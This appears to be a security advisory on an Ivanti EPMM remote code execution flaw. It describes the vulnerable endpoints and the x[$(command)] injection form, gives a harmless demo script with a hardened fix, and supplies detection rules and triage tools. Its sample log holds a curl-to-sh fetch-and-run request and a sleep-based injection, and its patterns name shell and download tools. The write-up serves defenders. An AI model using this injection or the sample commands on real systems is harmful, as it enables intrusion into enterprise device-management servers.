
CVE-2026-1340: Unauthenticated Remote Code Execution in Ivanti EPMM

The exploitation landscape for edge appliances has reached a critical tipping point. CVE-2026-1340, a code injection vulnerability in Ivanti Endpoint Manager Mobile (EPMM), represents a severe risk to enterprise infrastructure. Actively exploited in the wild, this RCE gives an unauthenticated attacker full control over the mobile device management (MDM) server: no credentials, no session, and no user interaction are required.

The vulnerability stems from the Apache web server invoking two legacy bash scripts, /mi/bin/map-appstore-url and /mi/bin/map-aft-store-url, to rewrite URLs for In-House Application Distribution. The scripts receive request-derived data from Apache and handle it unsafely.

An attacker abuses bash arithmetic evaluation to turn a request value into a command. The injection flow:

  1. Input Manipulation: Send a crafted GET request to a path under /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/; Apache hands the request path to the rewrite scripts.
  2. Variable Injection: The attacker-controlled value lands in a variable that the script later uses as an operand of a numeric test inside [[ ]] (e.g. if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]). Bash evaluates the operands of -gt as arithmetic expressions, not as literal numbers.
  3. Execution: Arithmetic evaluation expands array subscripts, so a value of the form x[$(command)] runs command through command substitution before the comparison even completes. The payload executes with the privileges of the script, yielding unauthenticated RCE.
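The bug class above, reproduced in a generic bash script. This is an added example, not Ivanti's script: the function names, the marker-file harness and the payload format are assumptions chosen to show the vulnerable comparison next to a hardened one.

```bash
#!/usr/bin/env bash
# Added example, not Ivanti's code: a minimal bash check of the same shape as
# the time-window comparison described above, shown vulnerable and hardened.
# Function names and the payload format are assumptions for illustration.

# Vulnerable pattern. Inside [[ ]], -gt evaluates BOTH operands as arithmetic
# expressions. Arithmetic evaluation expands array subscripts, so an operand of
# the form x[$(cmd)] runs cmd before the comparison even happens.
vuln_check() {
  local theCurrentTimeSeconds="$1" gStartTime="$2"
  if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
    echo expired
  else
    echo valid
  fi
}

# Hardened pattern. Validate that each operand is a plain decimal integer
# before it reaches any arithmetic context; reject everything else.
safe_check() {
  local theCurrentTimeSeconds="$1" gStartTime="$2"
  if [[ ! ${theCurrentTimeSeconds} =~ ^[0-9]+$ || ! ${gStartTime} =~ ^[0-9]+$ ]]; then
    echo rejected
    return 1
  fi
  if (( theCurrentTimeSeconds > gStartTime )); then
    echo expired
  else
    echo valid
  fi
}

# Harness: run a check with a constructed payload whose command substitution
# creates a marker file, then report whether that command actually executed.
# Prints "yes" if the injected command ran, "no" otherwise.
injection_fired() {
  local check="$1" marker payload
  marker=$(mktemp) && rm -f "$marker"
  # Constructed payload: array subscript containing a command substitution.
  # "echo 0" keeps the subscript a valid number so bash raises no error.
  payload="x[\$(touch '${marker}'; echo 0)]"
  "$check" "$payload" 0 >/dev/null 2>&1 || true
  if [ -e "$marker" ]; then
    rm -f "$marker"; echo yes
  else
    echo no
  fi
}

# Stand-alone demo.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
  echo "vulnerable check, injected command ran: $(injection_fired vuln_check)"
  echo "hardened check, injected command ran:   $(injection_fired safe_check)"
fi
```

The fix is input validation, not quoting: quoting the variable inside [[ ]] does not help, because the operand is still handed to the arithmetic evaluator. The same rule applies to (( )), $(( )), array indices and declare -i assignments, which all evaluate their input the same way.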

Threat actors are employing automated scanning frameworks to identify vulnerable instances, typically followed by these malicious operations:

  • Reconnaissance: Verification of RCE via time-based responses (using sleep commands).
  • Reverse Shells: Outbound connections back to attacker infrastructure using ncat, sh, or bash.
  • Web Shells: Installation of lightweight JSP web shells (e.g., 401.jsp, 403.jsp, 1.jsp) in /mi/tomcat/webapps/mifs/.
  • Malware Deployment: Downloading secondary payloads, including cryptominers and the Nezha monitoring agent.

Detection: the following Sigma rule flags requests to the vulnerable endpoints that also carry the gPath marker; a Splunk search of similar intent follows it. The uri field name must be mapped to the field your web-server log source actually uses. The two endpoint prefixes and the gPath marker live in separate selections so that the condition is an AND, not an OR.

```yaml
title: Ivanti EPMM RCE Attempt (CVE-2026-1340)
status: experimental
description: Detects exploitation attempts of CVE-2026-1340 targeting Ivanti EPMM
logsource:
  category: webserver
detection:
  selection_uri:
    uri|contains:
      - '/mifs/c/appstore/fob/'
      - '/mifs/c/aftstore/fob/'
  selection_param:
    uri|contains: 'gPath'
  condition: selection_uri and selection_param
level: high
```

The Splunk search is broader than the Sigma rule: it keeps any fob request that contains either the gPath marker or a common post-exploitation binary.

```spl
index=web_logs product="Ivanti EPMM"
| search uri="/mifs/c/*/fob/*"
| where match(_raw, "gPath") OR match(_raw, "(?i)(bin/sh|cmd\.exe|wget|curl)")
```

DFIR analysts must prioritize identifying unauthorized persistence. Key forensic artifacts include:

  • Web Shells: Scan /mi/tomcat/webapps/mifs/ for JSP files with suspicious content.
  • Process Artifacts: Look for unexpected child processes (/bin/sh, bash, curl, wget) spawned by the Apache httpd process that runs the rewrite scripts.
  • Log Analysis: Correlate anomalous access to /mifs/c/*/fob/* endpoints with subsequent host-based anomalies.
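Both the detection logic and the web-shell sweep above, as added shell triage helpers that are not Ivanti's code or any SIEM vendor's. The Apache combined log format, the payload regex and the JSP allowlist are assumptions; the sample log lines are constructed, not real exploitation traffic.

```bash
#!/usr/bin/env bash
# Added triage helpers, not Ivanti's or any SIEM vendor's code. The Apache
# combined log format, the payload regex and the JSP allowlist are assumptions;
# the sample log lines below are constructed, not real exploitation traffic.

# Decode %XX and '+' in a request path so an encoded "$(" or "/bin/sh" still
# matches. (printf %b also interprets backslash escapes; fine for triage.)
urldecode() {
  local s="${1//+/ }"
  printf '%b' "${s//%/\\x}"
}

# Read access-log lines on stdin; print those that both hit a vulnerable
# endpoint and carry injection or post-exploitation markers. This is the
# Sigma/Splunk logic above applied line by line.
hunt_access_log() {
  local line req decoded
  while IFS= read -r line; do
    req=${line#*\"}      # drop everything up to the opening quote of the request
    req=${req%%\"*}      # keep "GET /path HTTP/1.1"
    decoded=$(urldecode "$req")
    case "$decoded" in
      *"/mifs/c/appstore/fob/"*|*"/mifs/c/aftstore/fob/"*)
        if printf '%s' "$decoded" | grep -Eqi '\$\(|\$\{|`|/bin/(ba)?sh|wget|curl|ncat'; then
          printf '%s\n' "$line"
        fi ;;
    esac
  done
}

# Print .jsp files under a webapp directory whose basenames are not in the
# allowlist given as the remaining arguments (build that list from a known-good
# install or the vendor manifest; the one used in the demo is an assumption).
find_unexpected_jsp() {
  local root="$1"; shift
  local f name allowed keep
  while IFS= read -r f; do
    name=$(basename "$f"); keep=0
    for allowed in "$@"; do
      [ "$name" = "$allowed" ] && keep=1
    done
    if [ "$keep" -eq 0 ]; then printf '%s\n' "$f"; fi
  done < <(find "$root" -type f -name '*.jsp' | sort)
}

# Constructed sample: one benign fob request, two injection attempts (one URL
# encoded), and one suspicious request that is NOT on a fob endpoint.
sample_log() {
  cat <<'EOF'
10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] "GET /mifs/c/appstore/fob/abc123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2026:10:00:01 +0000] "GET /mifs/c/appstore/fob/x%5B%24%28sleep%2010%29%5D HTTP/1.1" 500 0 "-" "python-requests/2.31"
203.0.113.9 - - [01/Jan/2026:10:00:05 +0000] "GET /mifs/c/aftstore/fob/x[$(curl%20http://203.0.113.9/a.sh|sh)] HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2026:10:00:09 +0000] "GET /mifs/login.jsp?x=$(id) HTTP/1.1" 200 100 "-" "Mozilla/5.0"
EOF
}

# Number of sample lines the hunt flags (the two fob injection attempts).
count_hits() {
  sample_log | hunt_access_log | wc -l | tr -d ' '
}

# Demo of the JSP sweep in a throwaway directory: one expected file, one
# dropped web shell named like those observed in the wild.
jsp_demo() {
  local root; root=$(mktemp -d)
  mkdir -p "$root/mifs"
  : > "$root/mifs/index.jsp"
  : > "$root/mifs/401.jsp"
  find_unexpected_jsp "$root/mifs" index.jsp | sed "s#^$root/##"
  rm -rf "$root"
}

# Stand-alone demo.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
  sample_log | hunt_access_log
  jsp_demo
fi
```

On a live appliance, feed hunt_access_log the Apache access log and point find_unexpected_jsp at /mi/tomcat/webapps/mifs/ with an allowlist taken from a clean install of the same build. Decoding before matching matters: the second sample line is only caught because %24%28 is decoded back to $(.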